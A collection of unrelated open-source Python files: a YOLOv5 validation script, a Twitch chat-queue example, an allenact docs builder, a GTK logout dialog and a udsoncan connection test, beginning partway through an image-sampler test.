return img.mean(axis=(0,1), exclude=True)
def l2_distance(a, b):
return nd.sqrt(nd.square(a-b).sum(axis=0, exclude=True))
sampler = ImageSampler(img_size/8, img_size/2, img_size*10, img_size*100, img_size)
batch_sampler = BatchSampler(batches, sampler, net=mean, distance=l2_distance, mining=[MiningTypes.RANDOM_HARD_NEGATIVE, MiningTypes.RANDOM_HARD_POSITIVE])
images, coords, px_coords, valid = batch_sampler.getTripletBatch()
return images, coords, px_coords, valid
if __name__ == '__main__':
unitTest()
|
val.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Validate a trained YOLOv5 model accuracy on a custom dataset
Usage:
$ python path/to/val.py --data coco128.yaml --weights yolov5s.pt --img 640
"""
import argparse
import json
import os
import sys
from pathlib import Path
from threading import Thread
import numpy as np
import torch
from tqdm import tqdm
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0] # YOLOv5 root directory
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from models.common import DetectMultiBackend
from utils.callbacks import Callbacks
from utils.datasets import create_dataloader
from utils.general import (LOGGER, NCOLS, box_iou, check_dataset, check_img_size, check_requirements, check_yaml,
coco80_to_coco91_class, colorstr, increment_path, non_max_suppression, print_args,
scale_coords, xywh2xyxy, xyxy2xywh)
from utils.metrics import ConfusionMatrix, ap_per_class
from utils.plots import output_to_target, plot_images, plot_val_study
from utils.torch_utils import select_device, time_sync
def save_one_txt(predn, save_conf, shape, file):
# Save one txt result
gn = torch.tensor(shape)[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(file, 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
def save_one_json(predn, jdict, path, class_map):
# Save one JSON result {"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(predn.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': class_map[int(p[5])],
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
def process_batch(detections, labels, iouv):
"""
Return correct predictions matrix. Both sets of boxes are in (x1, y1, x2, y2) format.
Arguments:
detections (Array[N, 6]), x1, y1, x2, y2, conf, class
labels (Array[M, 5]), class, x1, y1, x2, y2
Returns:
correct (Array[N, 10]), for 10 IoU levels
"""
correct = torch.zeros(detections.shape[0], iouv.shape[0], dtype=torch.bool, device=iouv.device)
iou = box_iou(labels[:, 1:], detections[:, :4])
x = torch.where((iou >= iouv[0]) & (labels[:, 0:1] == detections[:, 5])) # IoU above threshold and classes match
if x[0].shape[0]:
matches = torch.cat((torch.stack(x, 1), iou[x[0], x[1]][:, None]), 1).cpu().numpy() # [label, detection, iou]
if x[0].shape[0] > 1:
matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 1], return_index=True)[1]]
# matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 0], return_index=True)[1]]
matches = torch.Tensor(matches).to(iouv.device)
correct[matches[:, 1].long()] = matches[:, 2:3] >= iouv
return correct
@torch.no_grad()
def run(data,
weights=None, # model.pt path(s)
batch_size=32, # batch size
imgsz=640, # inference size (pixels)
conf_thres=0.001, # confidence threshold
iou_thres=0.6, # NMS IoU threshold
task='val', # train, val, test, speed or study
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
single_cls=False, # treat as single-class dataset
augment=False, # augmented inference
verbose=False, # verbose output
save_txt=False, # save results to *.txt
save_hybrid=False, # save label+prediction hybrid results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_json=False, # save a COCO-JSON results file
project=ROOT / 'runs/val', # save to project/name
name='exp', # save to project/name
exist_ok=False, # existing project/name ok, do not increment
half=True, # use FP16 half-precision inference
dnn=False, # use OpenCV DNN for ONNX inference
model=None,
dataloader=None,
save_dir=Path(''),
plots=True,
callbacks=Callbacks(),
compute_loss=None,
):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device, pt = next(model.parameters()).device, True # get model device, PyTorch model
half &= device.type != 'cpu' # half precision only supported on CUDA
model.half() if half else model.float()
else: # called directly
device = select_device(device, batch_size=batch_size)
# Directories
save_dir = increment_path(Path(project) / name, exist_ok=exist_ok) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = DetectMultiBackend(weights, device=device, dnn=dnn)
stride, pt = model.stride, model.pt
imgsz = check_img_size(imgsz, s=stride) # check image size
half &= pt and device.type != 'cpu' # half precision only supported by PyTorch on CUDA
if pt:
model.model.half() if half else model.model.float()
else:
half = False
batch_size = 1 # export.py models default to batch-size 1
device = torch.device('cpu')
LOGGER.info(f'Forcing --batch-size 1 square inference shape(1,3,{imgsz},{imgsz}) for non-PyTorch backends')
# Data
data = check_dataset(data) # check
# Configure
model.eval()
is_coco = isinstance(data.get('val'), str) and data['val'].endswith('coco/val2017.txt') # COCO dataset
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Dataloader
if not training:
if pt and device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.model.parameters()))) # warmup
pad = 0.0 if task == 'speed' else 0.5
task = task if task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, stride, single_cls, pad=pad, rect=pt,
prefix=colorstr(f'{task}: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
class_map = coco80_to_coco91_class() if is_coco else list(range(1000))
s = ('%20s' + '%11s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
dt, p, r, f1, mp, mr, map50, map = [0.0, 0.0, 0.0], 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class = [], [], [], []
pbar = tqdm(dataloader, desc=s, ncols=NCOLS, bar_format='{l_bar}{bar:10}{r_bar}{bar:-10b}') # progress bar
for batch_i, (im, targets, paths, shapes) in enumerate(pbar):
t1 = time_sync()
if pt:
im = im.to(device, non_blocking=True)
targets = targets.to(device)
im = im.half() if half else im.float() # uint8 to fp16/32
im /= 255 # 0 - 255 to 0.0 - 1.0
nb, _, height, width = im.shape # batch size, channels, height, width
t2 = time_sync()
dt[0] += t2 - t1
# Inference
out, train_out = model(im) if training else model(im, augment=augment, val=True) # inference, loss outputs
dt[1] += time_sync() - t2
# Loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1] # box, obj, cls
# NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t3 = time_sync()
out = non_max_suppression(out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls)
dt[2] += time_sync() - t3
# Metrics
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path, shape = Path(paths[si]), shapes[si][0]
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
if single_cls:
pred[:, 5] = 0
predn = pred.clone()
scale_coords(im[si].shape[1:], predn[:, :4], shape, shapes[si][1]) # native-space pred
# Evaluate
if nl:
tbox = xywh2xyxy(labels[:, 1:5]) # target boxes
scale_coords(im[si].shape[1:], tbox, shape, shapes[si][1]) # native-space labels
labelsn = torch.cat((labels[:, 0:1], tbox), 1) # native-space labels
correct = process_batch(predn, labelsn, iouv)
if plots:
confusion_matrix.process_batch(predn, labelsn)
else:
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls)) # (correct, conf, pcls, tcls)
# Save/log
if save_txt:
save_one_txt(predn, save_conf, shape, file=save_dir / 'labels' / (path.stem + '.txt'))
if save_json:
save_one_json(predn, jdict, path, class_map) # append to COCO-JSON dictionary
callbacks.run('on_val_image_end', pred, predn, path, names, im[si])
# Plot images
if plots and batch_i < 3:
f = save_dir / f'val_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(im, targets, paths, f, names), daemon=True).start()
f = save_dir / f'val_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(im, output_to_target(out), paths, f, names), daemon=True).start()
# Compute metrics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%11i' * 2 + '%11.3g' * 4 # print format
LOGGER.info(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
LOGGER.info(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in dt) # speeds per image
if not training:
shape = (batch_size, 3, imgsz, imgsz)
LOGGER.info(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
callbacks.run('on_val_end')
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = str(Path(data.get('path', '../coco')) / 'annotations/instances_val2017.json') # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
LOGGER.info(f'\nEvaluating pycocotools mAP... saving {pred_json}...')
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
check_requirements(['pycocotools'])
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
LOGGER.info(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
LOGGER.info(f"Results saved to {colorstr('bold', save_dir)}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument('--data', type=str, default=ROOT / 'data/coco128.yaml', help='dataset.yaml path')
parser.add_argument('--weights', nargs='+', type=str, default=ROOT / 'yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--batch-size', type=int, default=32, help='batch size')
parser.add_argument('--imgsz', '--img', '--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='NMS IoU threshold')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a COCO-JSON results file')
parser.add_argument('--project', default=ROOT / 'runs/val', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference')
opt = parser.parse_args()
opt.data = check_yaml(opt.data) # check YAML
opt.save_json |= opt.data.endswith('coco.yaml')
opt.save_txt |= opt.save_hybrid
print_args(FILE.stem, opt)
return opt
def main(opt):
check_requirements(requirements=ROOT / 'requirements.txt', exclude=('tensorboard', 'thop'))
if opt.task in ('train', 'val', 'test'): # run normally
if opt.conf_thres > 0.001: # https://github.com/ultralytics/yolov5/issues/1466
LOGGER.info(f'WARNING: confidence threshold {opt.conf_thres} >> 0.001 will produce invalid mAP values.')
run(**vars(opt))
else:
weights = opt.weights if isinstance(opt.weights, list) else [opt.weights]
opt.half = True # FP16 for fastest results
if opt.task == 'speed': # speed benchmarks
# python val.py --task speed --data coco.yaml --batch 1 --weights yolov5n.pt yolov5s.pt...
opt.conf_thres, opt.iou_thres, opt.save_json = 0.25, 0.45, False
for opt.weights in weights:
run(**vars(opt), plots=False)
elif opt.task == 'study': # speed vs mAP benchmarks
# python val.py --task study --data coco.yaml --iou 0.7 --weights yolov5n.pt yolov5s.pt...
for opt.weights in weights:
f = f'study_{Path(opt.data).stem}_{Path(opt.weights).stem}.txt' # filename to save to
x, y = list(range(256, 1536 + 128, 128)), [] # x axis (image sizes), y axis
for opt.imgsz in x: # img-size
LOGGER.info(f'\nRunning {f} --imgsz {opt.imgsz}...')
r, _, t = run(**vars(opt), plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_val_study(x=x) # plot
if __name__ == "__main__":
opt = parse_opt()
main(opt)
|
chat_queue.py
|
import threading
import queue # Queue for python 2
import pytwitcherapi
session = ... # we assume an authenticated TwitchSession
channel = session.get_channel('somechannel')
client = pytwitcherapi.IRCClient(session, channel, queuesize=0)
t = threading.Thread(target=client.process_forever)
t.start()
try:
while True:
try:
m = client.messages.get(block=False)
except queue.Empty:
pass
else:
# Now you have the message in the main thread
# and can display the message in the
# GUI or wherever you want
print "Message from %s to %s: %s" % (m.source, m.target, m.text)
finally:
client.shutdown()
t.join()
|
build_docs.py
|
import glob
import os
import shutil
from pathlib import Path
from subprocess import check_output
from threading import Thread
from typing import Dict, Union, Optional, Set, List, Sequence, Mapping
from git import Git
from ruamel.yaml import YAML # type: ignore
from constants import ABS_PATH_OF_TOP_LEVEL_DIR
from scripts.literate import literate_python_to_markdown
class StringColors:
HEADER = "\033[95m"
OKBLUE = "\033[94m"
OKGREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
exclude_files = [
".DS_Store",
"__init__.py",
"__init__.pyc",
"README.md",
"version.py",
"run.py",
"setup.py",
"main.py",
]
def render_file(
relative_src_path: str, src_file: str, to_file: str, modifier=""
) -> None:
"""Shells out to pydocmd, which creates a .md file from the docstrings of
python functions and classes in the file we specify.
The modifer specifies the depth at which to generate docs for
classes and functions in the file. More information here:
https://pypi.org/project/pydoc-markdown/
"""
# First try literate
was_literate = False
try:
was_literate = literate_python_to_markdown(
path=os.path.join(relative_src_path, src_file)
)
except Exception as _:
pass
if was_literate:
return
# Now do standard pydocmd
relative_src_namespace = relative_src_path.replace("/", ".")
src_base = src_file.replace(".py", "")
if relative_src_namespace == "":
namespace = f"{src_base}{modifier}"
else:
namespace = f"{relative_src_namespace}.{src_base}{modifier}"
pydoc_config = """'{
renderer: {
type: markdown,
code_headers: true,
descriptive_class_title: false,
add_method_class_prefix: true,
source_linker: {type: github, repo: allenai/allenact},
header_level_by_type: {
Module: 1,
Class: 2,
Method: 3,
Function: 3,
Data: 3,
}
}
}'"""
pydoc_config = " ".join(pydoc_config.split())
args = ["pydoc-markdown", "-m", namespace, pydoc_config]
try:
call_result = check_output([" ".join(args)], shell=True, env=os.environ).decode(
"utf-8"
)
# noinspection PyShadowingNames
with open(to_file, "w") as f:
doc_split = call_result.split("\n")
# github_path = "https://github.com/allenai/allenact/tree/master/"
# path = (
# github_path + namespace.replace(".", "/") + ".py"
# )
# mdlink = "[[source]]({})".format(path)
mdlink = "" # Removing the above source link for now.
call_result = "\n".join([doc_split[0] + " " + mdlink] + doc_split[1:])
f.write(call_result)
print(
f"{StringColors.OKGREEN}[SUCCESS]{StringColors.ENDC} built docs for {src_file} -> {to_file}."
)
except Exception as _:
cmd = " ".join(args)
print(
f"{StringColors.WARNING}[SKIPPING]{StringColors.ENDC} could not"
f" build docs for {src_file} (missing an import?). CMD: '{cmd}'"
)
# noinspection PyShadowingNames
def build_docs_for_file(
relative_path: str, file_name: str, docs_dir: str, threads: List
) -> Dict[str, str]:
"""Build docs for an individual python file."""
clean_filename = file_name.replace(".py", "")
markdown_filename = f"{clean_filename}.md"
output_path = os.path.join(docs_dir, relative_path, markdown_filename)
nav_path = os.path.join("api", relative_path, markdown_filename)
thread = Thread(target=render_file, args=(relative_path, file_name, output_path))
thread.start()
threads.append(thread)
return {os.path.basename(clean_filename): nav_path}
# noinspection PyShadowingNames
def build_docs(
base_dir: Union[Path, str],
root_path: Union[Path, str],
docs_dir: Union[Path, str],
threads: List,
allowed_dirs: Optional[Set[str]] = None,
):
base_dir, root_path, docs_dir = str(base_dir), str(root_path), str(docs_dir)
nav_root = []
for child in os.listdir(root_path):
relative_path = os.path.join(root_path, child)
if (
(allowed_dirs is not None)
and (os.path.isdir(relative_path))
and (os.path.abspath(relative_path) not in allowed_dirs)
# or ".git" in relative_path
# or ".idea" in relative_path
# or "__pycache__" in relative_path
# or "tests" in relative_path
# or "mypy_cache" in relative_path
):
print("SKIPPING {}".format(relative_path))
continue
# without_allenact = str(root_path).replace("allenact/", "")
new_path = os.path.relpath(root_path, base_dir).replace(".", "")
target_dir = os.path.join(docs_dir, new_path)
if not os.path.exists(target_dir):
os.mkdir(target_dir)
if os.path.isdir(relative_path):
nav_subsection = build_docs(
base_dir,
relative_path,
docs_dir,
threads=threads,
allowed_dirs=allowed_dirs,
)
if not nav_subsection:
continue
nav_root.append({child: nav_subsection})
else:
if child in exclude_files or not child.endswith(".py"):
continue
nav = build_docs_for_file(new_path, child, docs_dir, threads=threads)
nav_root.append(nav)
return nav_root
def project_readme_paths_to_nav_structure(project_readmes):
nested_dict = {}
for fp in project_readmes:
has_seen_project_dir = False
sub_nested_dict = nested_dict
split_fp = os.path.dirname(fp).split("/")
for i, yar in enumerate(split_fp):
has_seen_project_dir = has_seen_project_dir or yar == "projects"
if not has_seen_project_dir or yar == "projects":
continue
if yar not in sub_nested_dict:
if i == len(split_fp) - 1:
sub_nested_dict[yar] = fp.replace("docs/", "")
break
else:
sub_nested_dict[yar] = {}
sub_nested_dict = sub_nested_dict[yar]
def recursively_create_nav_structure(nested_dict):
if isinstance(nested_dict, str):
return nested_dict
to_return = []
for key in nested_dict:
to_return.append({key: recursively_create_nav_structure(nested_dict[key])})
return to_return
return recursively_create_nav_structure(nested_dict)
def pruned_nav_entries(nav_entries):
if isinstance(nav_entries, str):
if os.path.exists(os.path.join("docs", nav_entries)):
return nav_entries
else:
return None
elif isinstance(nav_entries, Sequence):
new_entries = []
for entry in nav_entries:
entry = pruned_nav_entries(entry)
if entry:
new_entries.append(entry)
return new_entries
elif isinstance(nav_entries, Mapping):
new_entries = {}
for k, entry in nav_entries.items():
entry = pruned_nav_entries(entry)
if entry:
new_entries[k] = entry
return new_entries
else:
raise NotImplementedError()
def main():
os.chdir(ABS_PATH_OF_TOP_LEVEL_DIR)
print("Copying all README.md files to docs.")
with open("README.md") as f:
readme_content = f.readlines()
readme_content = [x.replace("docs/", "") for x in readme_content]
with open("docs/index.md", "w") as f:
f.writelines(readme_content)
project_readmes = []
for readme_file_path in glob.glob("projects/**/README.md", recursive=True):
if "docs/" not in readme_file_path:
new_path = os.path.join("docs", readme_file_path)
os.makedirs(os.path.dirname(new_path), exist_ok=True)
shutil.copy(readme_file_path, new_path)
project_readmes.append(new_path)
print("Copying LICENSE file to docs.")
shutil.copy("LICENSE", "docs/LICENSE.md")
print("Copying CONTRIBUTING.md file to docs.")
shutil.copy("CONTRIBUTING.md", "docs/CONTRIBUTING.md")
# print("Copying CNAME file to docs.")
# shutil.copy("CNAME", "docs/CNAME")
print("Building the docs.")
parent_folder_path = Path(__file__).parent.parent
yaml_path = parent_folder_path / "mkdocs.yml"
source_path = parent_folder_path
docs_dir = str(parent_folder_path / "docs" / "api")
if not os.path.exists(docs_dir):
os.mkdir(docs_dir)
# Adding project readmes to the yaml
yaml = YAML()
mkdocs_yaml = yaml.load(yaml_path)
site_nav = mkdocs_yaml["nav"]
# TODO Find a way to do the following in a way that results in nice titles.
# projects_key = "Projects using allenact"
# nav_obj = None
# for obj in site_nav:
# if projects_key in obj:
# nav_obj = obj
# break
# nav_obj[projects_key] = project_readme_paths_to_nav_structure(project_readmes)
with open(yaml_path, "w") as f:
yaml.dump(mkdocs_yaml, f)
# Get directories to ignore
git_dirs = set(
os.path.abspath(os.path.split(p)[0]) for p in Git(".").ls_files().split("\n")
)
ignore_rel_dirs = [
"docs",
"scripts",
"experiments",
"src",
".pip_src",
"dist",
"build",
]
ignore_abs_dirs = set(
os.path.abspath(os.path.join(str(parent_folder_path), rel_dir))
for rel_dir in ignore_rel_dirs
)
for d in ignore_abs_dirs:
if d in git_dirs:
git_dirs.remove(d)
threads: List = []
nav_entries = build_docs(
parent_folder_path,
source_path,
docs_dir,
threads=threads,
allowed_dirs=git_dirs,
)
nav_entries.sort(key=lambda x: list(x)[0], reverse=False)
for thread in threads:
thread.join()
nav_entries = pruned_nav_entries(nav_entries)
docs_key = "API"
# Find the yaml corresponding to the API
nav_obj = None
for obj in site_nav:
if docs_key in obj:
nav_obj = obj
break
nav_obj[docs_key] = nav_entries
with open(yaml_path, "w") as f:
yaml.dump(mkdocs_yaml, f)
if __name__ == "__main__":
main()
|
lcarsde-logout.py
|
#!/usr/bin/env python3
import gi
import psutil
import os
import subprocess
from multiprocessing import Process
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk, Gio, GLib
css = b'''
.button {
min-height: 38px;
font-family: 'Ubuntu Condensed', sans-serif;
font-weight: 600;
font-size: 18px;
color: #000;
text-shadow: none;
outline-style: none;
border-radius: 25px;
border-width: 0;
box-shadow: none;
padding: 2px 20px;
margin: 0;
}
.button--c9c {
background-color: #c9c;
background: #c9c; /* for Ubuntu */
}
.button--99c {
background-color: #99c;
background: #99c; /* for Ubuntu */
}
.button--c66 {
background-color: #c66;
background: #c66; /* for Ubuntu */
}
.button--f96 {
background-color: #f96;
background: #f96; /* for Ubuntu */
}
.category {
font-family: 'Ubuntu Condensed', sans-serif;
font-weight: 600;
font-size: 24px;
color: #f90;
}
.line-end {
min-width: 20px;
background-color: #99F;
background: #99F; /* for Ubuntu */
outline-style: none;
border-width: 0;
box-shadow: none;
padding: 0;
margin: 0;
}
.line-end--left {
border-radius: 20px 0 0 20px;
}
.line-end--right {
border-radius: 0 20px 20px 0;
}
.window {
background-color: #000;
}
'''
class LcarsdeLogout(Gtk.Window):
"""
lcarsde logout main window
"""
def __init__(self):
Gtk.Window.__init__(self, title="Logout")
self.css_provider = Gtk.CssProvider()
self.css_provider.load_from_data(css)
self.scroll_container = Gtk.ScrolledWindow()
self.scroll_container.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC)
self.app_container = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=8)
self.setup_buttons()
self.scroll_container.add(self.app_container)
self.add(self.scroll_container)
self.connect('size-allocate', self.view_changed)
self.get_style_context().add_class("window")
self.get_style_context().add_provider(self.css_provider, Gtk.STYLE_PROVIDER_PRIORITY_USER)
def view_changed(self, widget, event, data=None):
adj = self.scroll_container.get_vadjustment()
adj.set_value(0)
def setup_buttons(self):
handler = LcarsdeLogout.get_handler("Stop", "PowerOff")
if handler is not None:
self.create_button("Shutdown", handler, "c66")
handler = LcarsdeLogout.get_handler("Restart", "Reboot")
if handler is not None:
self.create_button("Reboot", handler, "f96")
handler = LcarsdeLogout.get_handler("Suspend", "Suspend")
if handler is not None:
self.create_button("Suspend", handler, "c9c")
handler = LcarsdeLogout.get_handler("Hibernate", "Hibernate")
if handler is not None:
self.create_button("Hibernate", handler, "c9c")
if LcarsdeLogout.is_lock_screen_available():
self.create_button("Lock Screen", LcarsdeLogout.lock_screen, "99c")
self.create_button("Logout", LcarsdeLogout.logout, "f96")
def create_button(self, label, handler, color):
button = Gtk.Button(label=label)
button.connect("clicked", lambda w: handler())
button.set_alignment(1, 1)
button.get_style_context().add_class("button")
button.get_style_context().add_class("button--{}".format(color))
button.get_style_context().add_provider(self.css_provider, Gtk.STYLE_PROVIDER_PRIORITY_USER)
self.app_container.add(button)
@staticmethod
def get_proxy(name, object_path, interface_name):
bus = Gio.bus_get_sync(Gio.BusType.SYSTEM, None)
return Gio.DBusProxy.new_sync(bus, Gio.DBusProxyFlags.NONE, None, name, object_path, interface_name, None)
@staticmethod
def is_method_available(proxy, method_name):
try:
result = proxy.call_sync(method_name, None, Gio.DBusCallFlags.NONE, 100, None)
except GLib.GError:
return False
return result[0] == 'yes'
@staticmethod
def is_console_kit_method_available(method_name):
"""
:param method_name: Stop or Restart
"""
proxy = LcarsdeLogout.get_proxy('org.freedesktop.ConsoleKit', '/org/freedesktop/ConsoleKit/Manager',
'org.freedesktop.ConsoleKit.Manager')
return LcarsdeLogout.is_method_available(proxy, method_name)
@staticmethod
def run_console_kit_method(method_name):
"""
:param method_name: Stop or Restart
"""
proxy = LcarsdeLogout.get_proxy('org.freedesktop.ConsoleKit', '/org/freedesktop/ConsoleKit/Manager',
'org.freedesktop.ConsoleKit.Manager')
proxy.call_sync(method_name, None, Gio.DBusCallFlags.NONE, 100, None)
@staticmethod
def is_systemd_method_available(method_name):
"""
:param method_name: PowerOff, Reboot, Suspend or Hibernate
"""
proxy = LcarsdeLogout.get_proxy('org.freedesktop.login1', '/org/freedesktop/login1',
'org.freedesktop.login1.Manager')
return LcarsdeLogout.is_method_available(proxy, method_name)
@staticmethod
def run_systemd_method(method_name):
"""
:param method_name: PowerOff, Reboot, Suspend or Hibernate
"""
proxy = LcarsdeLogout.get_proxy('org.freedesktop.login1', '/org/freedesktop/login1',
'org.freedesktop.login1.Manager')
parameter = GLib.Variant.new_tuple(GLib.Variant.new_boolean(True))
proxy.call_sync(method_name, parameter, Gio.DBusCallFlags.NONE, 100, None)
@staticmethod
def get_handler(console_kit_method, systemd_method):
"""
:param console_kit_method: method name for action via ConsoleKit
:param systemd_method: method name for action via SystemD
:return: handler for calling the action or None, if action is not available
"""
if LcarsdeLogout.is_console_kit_method_available("Can" + console_kit_method):
return lambda: LcarsdeLogout.run_console_kit_method(console_kit_method)
elif LcarsdeLogout.is_systemd_method_available("Can" + systemd_method):
return lambda: LcarsdeLogout.run_systemd_method(systemd_method)
else:
return None
@staticmethod
def is_lock_screen_available():
return any(
os.access(os.path.join(path, "xdg-screensaver"), os.X_OK)
for path in os.environ["PATH"].split(os.pathsep)
)
@staticmethod
def lock_screen():
p = Process(target=lambda c: subprocess.Popen(c.split()), args=("xdg-screensaver lock",))
p.start()
@staticmethod
def logout():
"""
Terminate lcarswm.kexe.
"""
for process in psutil.process_iter():
if process.name() == "lcarswm.kexe":
process.terminate()
break
if __name__ == "__main__":
win = LcarsdeLogout()
win.connect("destroy", Gtk.main_quit)
win.show_all()
Gtk.main()
|
test_connection.py
|
from test.UdsTest import UdsTest
from udsoncan.connections import *
from test.stub import StubbedIsoTPSocket
import socket
import threading
import time
import unittest
try:
_STACK_UNVAILABLE_REASON = ''
_interface_name = 'vcan0'
import isotp
import can
s = isotp.socket()
s.bind(_interface_name,rxid=1,txid=2)
s.close()
_STACK_POSSIBLE = True
except Exception as e:
_STACK_UNVAILABLE_REASON = str(e)
_STACK_POSSIBLE = False
class TestIsoTPSocketConnection(UdsTest):
def setUp(self):
self.tpsock1 = StubbedIsoTPSocket(timeout=0.1)
self.tpsock2 = StubbedIsoTPSocket(timeout=0.1)
def test_open(self):
conn = IsoTPSocketConnection(interface='vcan0', rxid=0x001, txid=0x002, tpsock=self.tpsock1, name='unittest')
self.assertFalse(conn.is_open())
conn.open()
self.assertTrue(conn.is_open())
conn.close()
self.assertFalse(conn.is_open())
def test_transmit(self):
conn1 = IsoTPSocketConnection(interface='vcan0', rxid=0x100, txid=0x101, tpsock=self.tpsock1, name='unittest')
conn2 = IsoTPSocketConnection(interface='vcan0', rxid=0x101, txid=0x100, tpsock=self.tpsock2, name='unittest')
with conn1.open():
with conn2.open():
payload1 = b"\x00\x01\x02\x03\x04"
conn1.send(payload1)
payload2 = conn2.wait_frame(timeout=0.3)
self.assertEqual(payload1, payload2)
